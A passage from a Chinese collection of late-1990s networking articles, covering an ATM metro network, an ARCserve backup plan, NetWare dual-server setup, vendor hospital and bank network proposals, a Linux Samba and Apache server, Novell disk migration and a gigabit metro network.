    我们对网络主干选用ATM技术，主要是从我们的应用需求考虑，目的是增加带宽以提高传输容量，并对全网的多媒体应用奠定基础。按照应用的特点和要求，适应全网的分布式管理模式，我们将整个城域网划分成一个中心网络区（主网区）和多个资源子网区，结合各资源子网的分布情况和管理方式，同时也充分考虑了整体价格因素，确定了使用Bay公司的ATM产品。同时，通过对网络多媒体应用分析论证，购置了Bay公司的OEM产品10625 ATM 25M交换机、部分到桌面的25M网卡、PictureTel公司视频会议系统和FVC公司的视频点播通播设备，保证了视频会议和ATM VOD视频点播及视频通播的质量。
    网络的结构是以主网区为中心向外以星型拓展，分别使用单膜光纤或多膜光纤连接各资源子网区。为了保证内部网的高可靠性和高安全性，在网络结构上采取了防故障保安全的对策，网络中心交换机为环形结构，主网区与资源子网区的ATM交换机采用双链路连接（由于Bay ATM设备的155M ATM连接负载均衡的特点，使得主干传输可达155X2Mb/s），主网区设备冗余备份，划分虚网，进行网段隔离。网络的结构示意图见图1。

    在这个网络环境里，ATM网络设备和以太网交换设备主要有：Bay System 5000BH和Centillion 100，它们作为中心交换机，支持双电源冗余和双MCP主控处理器冗余结构，同时它还能通过配置路由模块提供虚网路由的能力。
    Bay Centillion 100作为ATM边缘交换机在中心网络区提供均衡负载，在资源子网区作为ATM骨干接入交换设备。
    Bay Stack 303或304以太交换机作为各资源子网的终端接入设备。
    网络服务器主要有：Unix服务器三台，分别完成网管和公共信息Web服务，其余的网上服务器都是Windows NT服务器，承担了DNS服务、E-mail服务和各资源子网的内部服务器。在各内部服务器上都安装了网络数据库、TRS全文检索软件和Lotus Notes，为网上应用形成了基本的软件环境。另外，为了实现全网视频点播，我们还配置了独立的视频点播服务器系统，可容纳50小时的MPEG-1视频信息。

    二、网络性能分析

    针对网络的设计和实际应用的情况，我们就以下方面的网络性能加以阐述。
    1.先进性
    整个网络实现的技术在国内外具有先进性，符合当前技术和管理发展的方向。确保系统结构和网络技术都是成熟的，减少了系统应用的风险。主要表现在以下几个方面：
    1）网络协议采用了符合ISO及其他标准化结构，如IEEE、ITU-T、ANSI等制定的协议；
    2）网络主干采用ATM技术，桌面采用10/100M以太交换技术；
    3）用户端局域网跨ATM网络骨干实现VLAN划分，采用了目前先进的交换技术和虚拟网技术，如：基于交换机端口的虚网划分等；
    4）所选用的设备均经过实践的检验，在业界拥有优良的性能，并具有可管理性。
    2.可靠性
    网络系统的可靠运行是保证整个应用系统顺利运行的基础，本次网络建设我们把可靠性作为重点来加以考虑，但可靠性设计必然会带来投资的增大，所以，我们在设计时，对可靠性和投资加以权衡考虑。
    首先，为了保证网络系统的可靠性，我们选用久经实践考验、网络性能优良、运行稳定的设备；另外，为了节约投资，我们重点考虑中心设备的可靠性，适当配置网络系统冗余的设备，由于Bay的ATM交换机产品线很丰富，所以从投资和可靠性考虑，我们在中心配置3台ATM交换机并采用155M ATM双链路连接，这样，首先保证了网络设备的冗余；另外，各分区均采用双链路与中心交换机连接，保证了链路的冗余；采用GIGArray技术可以实现链路上的负载均衡及备份，保证了网络服务的冗余，既提供了高可用性又很大程度地优化了网络整体（网络主干链路的高带宽）的性能。
    3.带宽分析
    中心主干都提供155M的传输能力，服务器独享100M交换端口，工作站均独享10M交换端口，视频桌面站点提供25M的带宽，可以满足用户现在和未来的应用要求。
    对于某一业务部门，我们考虑了该业务部门有150个10M交换端口，对于每个交换端口，一般情况下，数据流量较大时可达到2～3Mb/s，这样上网的数据流量不大于500Mb/s，而且由于网络建设时已完成考虑各业务部门虚网的划分，这样大大减少了骨干数据的流量（骨干数据流量主要是各业务部门之间或各业务部门和上级之间），使得骨干的压力得到了减轻。以访问骨干网数据流量占20%为例，则骨干的访问数据流量为100Mb/s，而155Mb/s的骨干连接完全能满足各业务部门的骨干数据传输。
    4.VLAN的划分
    网络的实现中，中心交换机和边缘的ATM/LAN交换机均支持VLAN的划分，在边缘的ATM/LAN交换机上配置的快速以太网端口以实现和10MB以太网端口模块通信，可以满足站点对跨主干VLAN的划分需求，而下挂的Bay　303可以按组划分VLAN。整个VLAN的划分可以基于端口、协议、MAC地址等多种方法来完成。
    5.网络的扩展性
    在网络配置上，我们亦考虑了其将来的扩展能力，以保证该网络将来在技术和网络规模上的升级能力。我们采用的中心局域网交换机C100均具备很好的技术和网络规模（端口）升级能力。首先，这些交换机均采用模块化的结构，现在配置的设备均有空余槽，用户可通过增加模块来增加现有网络的端口数量，扩大网络规模。这些设备均支持622M ATM交换端口，可以适应网络容量的增加。另外，这些设备均使用ATM交换模块的结构，可以用更换ATM交换模块的方式来适应ATM技术和标准的发展。

    三、网络应用

    由于主干网是155Mb/s ATM，各资源子网内部是100Mb/s交换式以太网，大部分桌面为10Mb/s,还有部分25M ATM到桌面和少量的100/10Mb/s以太网终端，这些都为网上应用提供了良好的硬环境，到目前为止，我们在网上开发的比较成功的应用大致可分为：
    1.网络视频应用
    在网络方案设计时，我们对视频会议（VC）应用基本界定在：以提供实时的高质量音频和视频效果为目的，先在点到点之间进行，应用界面简单，易维护。所以我们选定了PictureTEL公司的产品（LiveLAN系列），在数台终端上安装了视频和音频输入/输出设备，使这些终端用户之间可以分别进行实时的音频、视频、文本数据、图文数据综合处理，圆满达到视频会议的要求。
    我们是分两个阶段实施全网VOD点播工作的。刚开始安装时，仅能在有25M网卡的终端上实现ATM QoS的VOD点播，而对10M网卡的终端还只能是以太网方式VOD点播。当用户多线路紧张的时候，图像质量得不到保证。到了1998年底，FVC公司的多媒体软件MOS IP5.0推出，我们在10M网卡用户的机器上安装了这个软件，同时也做了一些系统调整，使以太网用户也可以按IP地址配置系统，点播服务器对各IP分流，在以太网环境下看到有ATM QoS的视频画面。
    2.Web服务和网络数据库应用
    根据我们的业务特点，各资源子网都建立了自己的Intranet Web站点，采用浏览器/Web服务器的信息组织发布技术，构造信息资源的数据库和动态静态HTML主页，其中Web服务器采用MS IIS 3.0，数据库采用ORACLE Server　7.x和MS Access及MS ODBC驱动程序，开发平台为MS Frontpage 98 、MS InterDev、Delphi4.0等软件平台。从应用功能的角度提供了多种网上信息服务，不仅有每日刷新的静态和动态信息，还提供了网上教室、电子公告栏、娱乐休闲节目，以及客户机/服务器应用程序服务、应用程序执行等功能。
    针对原有局域网上MIS系统数据库上网发布的问题,我们研制了单独的数据库发布工具，使用户能够在不改变原始数据库结构的情况下，无需编程，做较少的工作就可以达到统一上网发布，在内部网上完成原有系统中需要共享的工作。
    3.TRS全文检索
    TRS全文检索系统是我们购置的一个软件，它有自己的数据库管理方式，同时提供Web界面。人们主要是对业务范围内需要按全文检索的资料库、电子刊物、规章制度等内容进行转换处理，加载到TRS可管理的数据库中，就可以借助TRS提供的检索手段，做到全文检索或按字段检索，并且能够根据建库的范围，定义搜索界限，提高查找速度。另外，TRS具有网员权限管理，对用户实行登录限制，我们的各资源子网都不同程度地采用了这个机制，对电子文本的浏览统一管理模式，现已上网可供全文检索的库约有30～40个。
    4.网上办公发文
    为了实现在城域网上的办公发文，我们在每个资源子网的NT服务器上安装了Lotus Notes软件平台，组织开发了一套适应内部办公流程的综合办公系统，它包括了公文转发、审批、存档；个人文档的建立、修改、删除、转贴及归类存储；E-mail的起草、发送、浏览并归类存档等。另外还对日常的工作安排、通知通告，建立了模板，同时提供口令设置、用户切换及一些常见工具的调用。

返回


一个办公环境的备份方案

《一键清理系统垃圾》

一个办公环境的备份方案

系统现状

该办公环境目前的网络共有13台服务器，其网络操作系统都是基于Windows NT平台，工作站端的系统有Windows 95/98等。

在服务器中，有一台域控制器、一台Web/电子邮件服务器、一台基于Microsoft SQL Server的数据库服务器，其它服务器大多是用来做文件服务器。这些服务器的硬盘容量为4GB、9GB不等。

用户对备份的要求

通过对现有网络现状的分析和调研，用户对备份的需求大致可以归纳为如下几点：

1.对于所采用的备份软件，要求安装方便、界面友好、使用灵活。

2.备份软件应能够提供集中管理方式，用户在一台机器上就可以备份从服务器到工作站整个网络的数据。

3.支持快速的灾难恢复。所采用的备份软件应提供一种机制，可以使用户在灾难发生后，在非常短的时间内恢复服务器和整个网络上的系统软件和数据。

4.能够保证备份数据的完整性。由于Microsoft SQL Server等大型数据库系统，数据文件是彼此相关联的，如果只备份其中的一个，所备份的数据很可能无法使用。保证备份数据的完整性，备份才具有意义。

5.全面保护操作系统内核数据。对操作系统的备份不仅仅是数据的备份，还有系统的内核数据，如Windows NT中的注册表信息等。

6.支持在文件和数据库正被使用时的备份。对于许多网络系统，可能在备份期间仍然有文件和数据库被打开使用，系统应该能够备份这些文件和数据库，否则会导致数据不完整。

7.支持多种备份方式，可以定时自动备份。除了支持常规备份方式（完全备份、增量备份、差分备份）以外，备份软件还可以设置备份启动日期和备份停止日期，且记录系统情况，实现无人值守的备份。

8.支持多种备份介质，如：磁带、光盘等。

9.具有相应的功能进行设备管理。包括对磁带机、磁带库、磁带阵列等的管理，并且能够保存设备活动情况记录，如首次格式化日期和格式化次数等。还应能够提供对重要备份介质的保护，防止误删除、误格式化。

10.支持多种校验手段和数据容错，以保证备份数据的正确性，如CRC校验、磁带与全部数据或部分数据的比较、RAID容错等。

11.支持备份的安全性，在备份时应能够设置备份的密码以防止未授权的恢复。

备份软件的选用及其

ARCserve特点介绍

备份软件的选用在备份方案的设计中占有非常重要的地位，也直接影响用户的备份效果。

在选用备份软件方面，有非专业备份软件和专业备份管理软件之分。非专业备份软件有：惠普公司所卖磁带机中随机提供的磁带备份软件CBW和STAC；Microsoft公司针对Windows NT平台的Backup Utility；Novell公司针对Netware操作系统的Sbackup；Unix系统下有Tar、Cpio。这些非专业备份软件，虽然价格低廉（有些还是免费的），但功能较弱。第三方知名厂商的专业备份管理软件目前功能最为完善而且技术成熟稳定的有CA公司的ARCserve 和Legato公司的Networker。其中，Networker备份软件价格高昂，ARCserve备份软件价格较为适中，性价比最好。

备份方案的设计

一套完整的备份方案应该包括备份软件的选择、备份介质的选择，以及日常备份制度和灾难应急措施。

1. 备份软件的配置

本方案中，我们选择CA公司的ARCserve作为备份软件，该软件可以满足上述用户对备份的所有需求。

根据用户的实际要求，我们选用的主程序和选件如表1所示。

在用户的网络中选用一台NT服务器来安装备份软件作为备份服务器，并在多台NT服务器上安装相应的Client Agent客户端代理软件，即可备份全网中多台服务器上的数据，提供全自动备份、在线式索引、归档管理、集中式管理等备份服务，实现全网络数据的高速、可靠、安全的备份归档，提供灾难恢复备份磁带。

2. 备份介质

由于磁带的成本是所有备份介质中最低的，而速度处于中上等水平，考虑到要保存长期的历史数据，磁带是最佳的介质。

由于用户备份数据量小于70GB，我们采用了惠普SureStore Autoloader DLT 718（1个读写驱动器，支持8个槽数）磁带机，备份速率可达10MB/s，在3小时内最大备份数据量达108GB。

实施过程中可以将惠普SureStore Autoloader DLT 718连接到备份服务器上。

3.日常备份制度

日常备份制度(Backup Routines)描述了每天的备份以什么方式、使用什么备份介质进行，是系统备份方案的具体实施细则。在制订完毕后，应严格按照制度进行日常备份，否则将无法达到备份方案的目标。

我们为用户制定的制度是传统的祖-父-子备份策略。这种策略由三级备份组成：日备份、周备份、月备份，日备份为增量备份，月备份和周备份为完全备份。

采用上述备份策略，无论系统在哪一天出现故障，最多需要2盘磁带就可以恢复系统数据（1盘最近的全备份磁带和1盘最近的差分备份磁带）。

4. 灾难应急措施

我们为用户提供的灾难应急措施是建立在Disaster Recovery（灾难防治与重建）上，它是一个独立软件，与ARCserve结合使用，为Windows NT网络提供非平行式的数据保护，它可以让使用者无须手动重新安装操作系统，就完全恢复宕掉的服务器，简化了重建的程序，并可显著地降低服务器宕机的时间。在服务器毁坏时，使用者只要用一组四片磁盘及微软的Windows NT光盘，就可简单地启动灾难重建向导，向导就会指示使用者恢复他们的操作系统。

如果网络上的某一工作站或服务器并未安装ARCserve，但是曾通过网络从ARCserve的服务器备份该机器的数据，而当该机发生灾难需要进行恢复时，可以不必在该机器上安装磁带机然后进行灾难恢复的工作，CA公司的Disaster Recovery具有支持跨网络进行远端灾难恢复(Remote Disaster Recovery)的能力，只要该台工作站的硬盘能够连上网络，而该网络上具有ARCserve的服务器，那么便能用几片灾难恢复向导磁盘，通过网络来对没有安装磁带机及ARCserve的工作站或软件进行灾难重建的工作。

  表1

名　称
功　 能

主模块
ARCserve for Windows NT高级版
在WindowsNT服务器或工作站上安装。该企业版可以管理对多个ARCserve主机，并对本地和远程系统进行备份。

灾难恢复选件
Disaster Recovery Option for NT
该选件可以创建灾难恢复引导磁盘。在发生灾难时，服务器可以在无需重新安装操作系统和ARCserve的情况下实现简捷迅速的恢复。

打开文件备份选件
Backup Agent for Open Files for NT
ARCserveIT备份代理可以保证所有备份的完整性，不会因为被其它应用锁住或使用而遗漏任何一个文件。代理技术保证备份数据的完整性和备份操作的透明性。该代理的许可按照按WindowsNT服务器为单位进行发放。

磁带库选件
Tape Library Option for Windows NT
支持单驱动器或多驱动器的磁带库设备。ARCserve可以自动为磁带分配序列号，甚至清洁装带机设备。该选件可以同ARCserveRAID选件一起使用。

SQL Server备份选件
Backup Agent for Microsoft SQL Server for Windows NT
ARCserveIT

与该备份代理的配合，可以在关键应用被打开和使用的过程中实现SQL

Server的安全自动的联机备份和恢复。

返回


一个不够，再来一个——用双服务器改造网络

《一键清理系统垃圾》

一个不够，再来一个——用双服务器改造网络

    改造网络的一种方法是换用较高性能的服务器、传输介质和连接设备等，但这种升级方法需更换较多的硬件设备，耗资较大，同时也并不见得能取得非常理想的效果。近日我在给某个单位改造网络时，利用双服务器结构成功实现网络升级改造，从而总结出一种既省钱又实用的改造方法。下面我就把具体过程介绍给大家。
    一、对新建网络的要求
    1.原有网络概况
    该教学单位有两个微机室。其中组建较早的一个微机室（一号机房）有50余台无硬盘386和486微机，网络服务器为COMPAQ486，操作系统为Netware3.12。后来组建的微机室（二号机房）有50台无硬盘586微机，服务器为COMPAQ586，操作系统也为Netware3.12，HUB为100M HUB。这两个网络一直担负着学生的计算机上机任务，运行良好。
    2.对新网络的要求
    要求每个工作站都能运行装在任一台服务器中的教学软件。
    二、对网络设备的选择和规划
    为了让原有的硬件设备都能发挥其作用，让100余台工作站都能使用所有的教学软件，且尽量小的改变现有网络的布线，将网络作如下的调整：
    将二号机房的586服务器移至一号机房的总控制室，并将两台服务器同时用细缆连于新购置的智能交换式10M/100M自适应HUB上。将原来一号机房的4个16口的共享HUB用一条细缆串接到与交换式HUB相连的转发器上，而二号机房的4个16口的100M HUB分别用双绞线连入与服务器直接相连的HUB的RJ－45接口上。连接后网络的结构如图所示：
    通过上述规划，两台服务器所运行的网络操作系统都是Netware3.12，每个工作站便可任意调用任何一台服务器上的文件，实现资源共享。考虑到不同软件对网络带宽的要求，并尽量提高工作站上教学软件的运行速度，可将一些常用的应用软件安装在486服务器上，而将教学软件安装在586服务器上，这样不但解决了所有工作站都能随时使用教学软件的问题，而且便于服务器软件和网络硬件的日常维护。
    三、对两台服务器软件的设置
    当网络连接完成之后，需对两台服务器进行有关软件的设置，否则，这两个服务器是无法在同一个网络系统中工作的。
    1.修改服务器中AUTOEXEC.NCF文件的内容
    分别启动两个文件服务器，修改其AUTOEXEC.NCF文件的内容。修改时注意两台服务器的“ server name”及“IPX Internal net”应设置成不同，而“bind IPX to PCNTNW net=”应设置为相同（其中PCNTNW为COMPAQ服务器中网卡自带的驱动程序，不同网卡其驱动程序不同）。修改以后两个服务器中AUTOEXEC.NCF文件的内容分别为：
    COMPAQ486服务器AUTOEXEC.NCF文件的内容为：
     server name XYW－A
    IPX Internal net 1995
    load c:\server.312\PCNTNW.LAN IOP=8800 Frame=Ethernet_802.3
    bind IPX to PCNTNW net=123
    mount all
    load monitor
    COMPAQ586服务器AUTOEXEC.NCF文件的内容为：
     server name XYW－B（应不同）
    IPX Internal net 1998（应不同）
    load c:\server.312\PCNTNW.LAN IOP=8800 Frame=Ethernet_802.3（视网卡而定）
    bind IPX to PCNTNW net=123（应相同）
    mount all
    load monitor
    2.检查工作站与服务器之间是否连通
    检查工作站与两台服务器之间是否连通的方法是从任意一台工作站上以Supervisor的身份登录，运行SYSCON文件，选择主菜单“Available Topics”下的“Change Current Server”选项，如此时工作站与第一台服务之间已经连通，则会出现第一个已连接的服务器名“XYW－A”，按“INS”键，若第二台服务器连接正常，则又出现第二个已连接的服务器名“XYW－B”。此时若选择主菜单下的“Use Information”选项，将会出现两个服务器的名称（XYW－A和XYW－B）和登录两个服务器时的身份(Supervisor)。
    3.修改系统登录原稿System Login Script
    工作站与两个服务器都连通后，我们就需修改两个服务器的系统登录原稿System Login Script。其方法是：从工作站上以Supervisor的身份登录，运行SYSCON文件，选择主菜单“Available Topics”下的“Supervisor Options”选项，再选取“System Login Script”，在此文件的前面加入如下内容：
    Attach XYW－A/supervisor
    Attach XYW－B/supervisor
    Map F:=XYW－A/SYS:LOGIN
    Map G:=XYW－B/SYS:LOGIN
    存盘后，便将F盘映射为486服务器，G盘映射为586服务器。
    通过上述的设置，重新启动两台服务器后以普通用户的身份从工作站登录服务器，便可显示有关两个服务器的网络映射关系。选择F盘就可进入486服务器，若选择的是G盘则进入586服务器，而且可随时在两台服务器间进行切换。这样，学生上机时便可根据每个人的上机内容任意选择服务器了。
    此网络目前运行良好，满足了现在的教学需求。

返回


医院系统解决方案

《一键清理系统垃圾》

医院系统解决方案

系 统 问 题 与 用 户 需 求:
...医院经常面临的关键问题是：行政管理程序缺乏信息技术基础设施和共同的应用程序。医院的信息技术覆盖率低。尽管在各个部门都应用了信息技术，如负责病理和药物的部门，但是它们与病员管理系统是各自独立的。每个医院与分院，或医院内部的各个部门又像是一个独立的信息岛。”

..现在，可以利用计算机网络实现的高质量应用极大地方便了医师的治疗工作，使他们可以提供最为迅速有效的医疗服务。由我们的网络产品构建的医院内部网络，不仅可以使医院继续提供，而且可以拓展出更为出色的服务。

...能够提供满足医院要求的整体解决方案。除了优异的性能之外，新的网络还具有易于管理和价格合理等特点。

解 决 方 案 分 析:

网 络 系 统
..建筑物（即七幢大楼）之间采用光纤进行连接。
.. 中心采用LTS6808G千兆骨干交换机。为满足医院内部局域网高宽带的需求，服务器选用了LTN1407-SX千兆网卡以防止各工作站同时操作数据库成的网络瓶颈；各分布大楼采用LTS6524G/LTS6516G/LTS6508G做为千兆分支交换机（具体型号视大楼内工作站的数目而定）保证二级交换机采用1000M上连到中心交换机；与分院之间的连接，通过申请一条DDN专线解决。两端分别利用LTR4100路由器实现总院局域网与分院局域网的高性能连接。

电 源 保 护
..为使系统运行稳定、连续及安全，在本系统中采用北京科尔茂公司的高性能的数字化在线式UPS---Chroma 9100系列 DSP UPS。其采用DSP、大屏幕液晶显示、智能化电池管理等先进技术，达成UPS的高性能化、高效率化、高可靠度化与智能化。为用户的重要设备提供绝对纯净稳定的不间断电源，结合双变换技术完全隔离不良电源如断电、尖峰、频率漂移、电源下陷、谐波等对设备的损害及防止数据资料的损失，结合智能化电源监控软件，为网络中的服务器、网络设备及用户端设备提供可靠安全完整的电源保护。为使系统运行稳定、连续及安全。

服 务 器
..Century PC2000具有最佳整体性能的高档企业级服务器 PC2000是一款支持双PentiumIII Xeon处理器的具有最佳整体性能的高档企业 级服务器，适用于对稳定性、可靠性、处理性能要求较高的关键应用环境。作为 企业内部局域网络的中心服务器更能体现出PC2000的性能优势，结合RAID技术可 进一步提高数据安全性，使在各行各业的企业级应用中都能应付自如。热插拔电 源可以保证你更安全的使用系统。

返回


银行系统解决方案

《一键清理系统垃圾》

银行系统解决方案

· 系 统 问 题 与 用 户 需 求 ·

银行系统是一个情况十分特殊的机构.总结起来有以下几个特点:
A.安全性高,防止外界的入侵.
B.带宽的要求较高,防止结算的高峰时产生数据拥塞.
C.要求服务器有很高的吞吐量.
D.要求有电源的有效保护.
E.网络环境要有冗余备份功能.
F.可以划分VLAN或ip switch做主交换机
.......................
银 行 分 局 网 络

银 行 系 统 网 络 系 统 结 构

解 决 方 案 分 析
网 络 系 统
LTnetcomm的高性能、功能全面的千兆&三层网络产品解决方案，对于改进银行系统的计算机系统问题具有明显的优势。
首先作为技术定位，以上网络方案优势表现在：
利用三层交换机作为局域网主干,防止发生广播风暴
利用spanning tree完成冗余备份的连接. 低价位的高带宽，可与Ethernet、Fast Ethernet平滑相连； 利用网管系统即可管理、监视和维护整个网络的运行；
Gigabit Ethernet端口与局域网的服务器相连减少了屏颈问题。
电 源 保 护
为使系统运行稳定、连续及安全，在本系统中采用北京科尔茂公司的高性能的数字化在线式UPS---Chroma 9100系列 DSP UPS。其采用DSP、大屏幕液晶显示、智能化电池管理等先进技术，达成UPS的高性能化、高效率化、高可靠度化与智能化。为用户的重要设备提供绝对纯净稳定的不间断电源，结合双变换技术完全隔离不良电源如断电、尖峰、频率漂移、电源下陷、谐波等对设备的损害及防止数据资料的损失，结合智能化电源监控软件，为网络中的服务器、网络设备及用户端设备提供可靠安全完整的电源保护。
服 务 器
SuperMicro 8050服务器是一款高端企业级服务器产品，具有强大的数据处理能力和优异的扩展性，具备高可用性、高可靠性和易管理性，是大型企业、重要行业、政府关键部门处理大数据量业务、关键任务时的最佳选择。它支持Intel最新的至强处理器,最多可扩充至四路。它不但能监控系统的电压、温度，内存、硬盘、风扇、电源等关键部件的故障，而且可以实现远程控制管理，从而降低维护成本。 是金融、银行、邮电、通信等行业的首选，胜任关键业务应用，电子商务、ERP、MIS、数据中心等大型应用系统。

返回


用Linux建立局域网服务器

《一键清理系统垃圾》

用Linux建立局域网服务器

    Linux系统作为网络服务器的优点数不胜数，但它的缺点也不少，特别是繁琐的配置让不少人望而却步。本文以TurboLinux 4.0为例，介绍配置局域网Linux服务器时的一些经验，希望对读者有一些帮助，也希望能起到抛砖引玉的作用。
    一、TCP/IP网络配置
    TurboLinux对网卡的支持还是比较好的，大部分网卡在安装时就可以自动检测出来。如果你的运气不好，Linux找不到你的网卡，可以进入X Windows，以root身分运行linuxconf命令。这是一个图形界面的配置工具，大部分Linux设置可以通过点点鼠标简单完成。首先在其中找到Basic Host Setting一项，在这一项中设置网卡的类型、I/O port和IRQ，一般没有列出的ISA卡可以用ne，PCI可以用ne或ne2k－pci，接着设置IP地址和子网掩码，只要和局域网中的其他机器设在同一个子网中就可以了。如果要连接外部网络还要设置网关。关于这方面的问题还可以参看TurboLinux的帮助文件。
    二、Samba服务器的配置
    Samba是一个文件和打印服务器，它最重要的特点就是可以和Win98/NT共享文件，还可以为其提供打印服务。简而言之，就是可以在Win98的网上邻居中看到Linux服务器，并能存取其中的文件。
    关于Samba的配置都存放在/etc/smb.conf中，其中多数可用它的默认设置，我就不再多说了，但有几处是非改不可的：
    ；smb.conf文件中采用类似于Windows ini 文件的方
    ；式，以[]为一段的开始，每一行为一个等号表达式，
    ；注释以打头。其中每一个[]都表示一个共享目录
    ；（global和printer）除外[global]中是一些通用的配
    ；置，其中对Win98机器比较重要的一个就是
    ；guestaccount，表示不用密码的用户名，如果在Win98
    ；中以这个用户名登录，访问public=yes的目录就
    ；不用密码，但不能访问public=no的目录。
    [global]
    guest account = guest
    ；Workgroup要改为Win98网络配置中所设的名字，
    ；不然网上邻居中就找不到这台机器
    workgroup = Samba Server
    [homes]
    ；因为Win98不区分大小写，而Linux却区分大小写，
    ；所以要加入以下两行
    preserve case = yes
    short preserve case = yes
    [myshare]
    ；如果要设置一个目录只对几个用户有读写权限，只
    ；要加入以下一行每两个用户名中间以空格分开
    valid users = user1 user2 user3
    设置完smb.conf文件后，运行turboservice，把samba服务设置为开机自动启动。
    以后Linux开机后，就可以在Win98的网上邻居中找到它了。
    以上只是用Win98共享Linux资源，那么如何用Linux共享Win98中的文件呢？其实更简单，只要用命令smbmount。例如：要共享另一台主机ntserver中sharefile目录，用户名是student，密码是1234，只要打入命令：
    smbmount ′\\ntserver\sharefile′ －U student －P 1234 /mnt/sharefile
    以后/mnt/sharefile就成了ntserver中的sharefile目录，如果没有用户名和密码－P 和 －U 参数就可以省掉了。
    三、Apache服务器的配置
    你是不是也想在局域网上发布主页呢？那就选择Apache吧。
    用Apache安装Http Server是最简单不过的了，只要用turboservice命令把Web Server服务启动即可。它的默认主页是/home/httpd/index.html，把它替换成自已的主页，然后在浏览器中输入Linux主机的IP地址看看有什么反应。
    只用IP地址实在太单调了，想不想试试用www.cpcw.com这样Cool的域名，那就看看下面的介绍吧。假设Linux主机的局域网中的IP地址是192.1.1.1，打开/etc/hosts文件，找到192.1.1.1对应的那一行，把主机的别名改为www.cpcw.com。然后把局域网中另一台Win98机器设置为通过局域网连接，并在局域网代理服务器设置一栏中填入Linux主机的IP地址。最后打开IE，输入www.cpcw.com，享受一下你的劳动成果吧！:）
    关于Linux服务器就说到这儿，如果有什么不妥之处，请写信告诉我（nj_jack@990.net）。


用卷拷贝的方法移植Novell网服务器

《一键清理系统垃圾》

用卷拷贝的方法移植Novell网服务器

    Novell网共享硬盘容量为1.6G。现欲用4.3G硬盘将原服务器上的内容全部移植到新硬盘上。由于服务器上的内容位于非DOS分区，无法用直接拷贝的方法进行，于是采用GHOST硬盘克隆工具，分别将网络引导部分的DOS分区及非DOS分区，克隆到新硬盘上。经试用，服务器运行正常，但其容量毫无增加，与原服务器相同。服务器移植无实际意义。
    这时按常规的办法是重装网络操作系统，但这样费时太多，许多软件太大，无法备份。我们经过反复摸索，找到了一条移植服务器的新方法。
    首先，在新硬盘上建立一个与原硬盘DOS分区容量相同的DOS分区，将原硬盘上的Novell网启动文件，复制过来。然后在新硬盘上运行sever.exe程序，将新盘的所有剩余空间全部建为非DOS分区，并建成卷SYS1（注：不得与原硬盘的卷名相同）。
    将新硬盘设置为主盘，原硬盘设置为从盘，一起安装到服务器上，开机启动，用一台工作站以超级用户上网，可看到服务器上已有两个卷SYS和SYS1，其中SYS卷已映射为F盘，用map命令将SYS1卷映射为H盘。用xcopy命令将F盘上的文件全部拷贝到H盘上。
    下网，关闭工作站和服务器。取下原硬盘，启动服务器，这时新盘已能正常启动。退出控制台，键入load install命令，将卷名SYS1改为SYS，退出，关闭服务器。
    重新启动服务器，用一台工作站以超级用户上网，发现原服务器上的所有文件和目录均完整无损，硬盘空间已扩大到4.2G，目的基本达到。但除超级用户和guest用户及用户组everycne外，所有用户及用户组均被清除，所有文件及目录权限均被取消。于是运行syscon程序，重新建立用户、用户组及授予适当的文件目录权限，即大功告成。各工作站上网运行，一切正常。


用千兆以太网构造城域网

《一键清理系统垃圾》

用千兆以太网构造城域网

介绍南京信息高速公路核心技术解决方案
    ■先进成熟的网络构建方案
    南京公众宽带IP城域网建网目标定位是采用先进成熟的技术，建设一个面向新世纪的、承载各类综合业务的高速社会基础信息网络。

    我们选择网络技术的重点问题集中在三个方面：网络的传送技术、交换技术、接入技术。对现有的各类技术进行综合比较，并结合最新发展，我们采用了IP交换和光纤千兆以太传输技术，利用光纤传输技术和综合信息缆方式，构建南京公众宽带IP城域网。

    千兆以太网技术的主要优点是简单、高效、较低的总体造价、与目前综合布线系统和IP应用服务以及计算机终端有着天然无缝的连接特性，线速路由与信元交换技术采用特别设计的ASIC硬件取代传统的软件处理，大大增强了路由交换性能，同时也降低了硬件费用。

    宽带IP城域网采用了以太网技术，但又突破了传统局域网的概念，科学合理的网络组织、基于光纤的IP/以太传输和线速IP/路由交换技术的采用，超越了传统局域网组网技术中的地域和拓扑限制，使得构建一个城域或更大范围的宽带IP网络成为可能。同时，我们在建设南京公众城域宽带IP网络时，考虑要建设一个适合未来10～15年整个社会信息化基础的电信级IP网络，而不是建立一个简单的企业网或校园网。下面将南京建立的电信级服务质量的宽带IP城域网与传统的电话网进行比较。

    宽带IP城域网与传统电话网的比较如图1。

    图1.宽带IP城域网与传统电话网结构对比

    ■一体的网络安全解决方案

    由于IP网络的开放性和以太网共享介质的技术特点，其数据安全性不能满足电信运营网络的要求，针对网络二层、三层数据交换机制特性和相应网络设备特点，我们采用了综合一体化的安全解决方案。它包括以下四个方面的安全控制机制：

    带内监视、带外控制的网络安全管理

    图2

    采用带内监视、带外控制的网管系统，将用户数据流和控制数据流完全分离，从控制机制上解决网络控制安全的问题。

    划分VLAN的用户安全隔离

    针对传统以太网用户安全性的问题，通过三层网络提供的VLAN功能，将各个用户划分在不同VLAN之内。没有相互通信需求的用户之间被完全隔离在不同VLAN之中，如同分别接在物理隔绝的不同交换机上，相互之间不能访问；有通信需求的用户通过第三层的路由功能实现互通，路由之上可以加载标准路由安全特性，保障用户之间安全受控互访。经过大量实际测试证明，宽带IP网在VLAN控制功能及路由安全特性的保障下，可以很好地实施系统安全策略，保证用户数据安全可靠。

    BAN内部10M以太网接口之间不允许交换，彻底解决网络内部的安全性问题。

    静态路由设置的路由安全保障

    图3

    对全网进行系统的地址规划，在此基础上，划分区域汇接范围，设置全网静态选路路由，用预置路由的方式保证网络的选路安全。通过路由的可预测性和集中控制配置保证数据在可信、安全的路由中实现可靠传输。

    地址策略的安全保障

    IP地址非常紧张，为了保证网络的可扩展性，采用保留地址策略，一方面解决地址不够的问题，另一方面杜绝了非法IP地址截取的安全问题。同时亦为有效地隔离外部因特网的干扰带来了方便。另外，仿照电话网编号的原理，将南京城区划分成142个区域，每个区域事先预留好充裕的IP地址段，一旦用户申请就根据用户的地理位置，按该区域段IP地址划分，既减少了路由表项，又保证未来工程扩容不会让用户更改地址。

    ■最后一公里问题的解决方案

    宽带IP网投入运营所面临的核心问题是最后一公里的接入问题。而在接入问题中最复杂的模型是信息化住宅小区的接入问题。在南京BIP网中，确立了最后一公里接入网解决方案，研制了宽带综合信息缆（BIIC），制定了小区接入模型和工程建设规范。 小区接入模型

    南京BIP网中小区接入采用的方式归纳为FTTZAN/BAN方式。FTTZAN/BAN接入是在光纤到小区、到住宅楼的基础上，利用“光纤+5类线”方式实现小区的高速信息接入。FTTZAN/BAN网络由小区接入网络、楼宇接入网络和网管系统组成，其结构如图2所示：

    宽带综合信息缆（BIIC）的研制

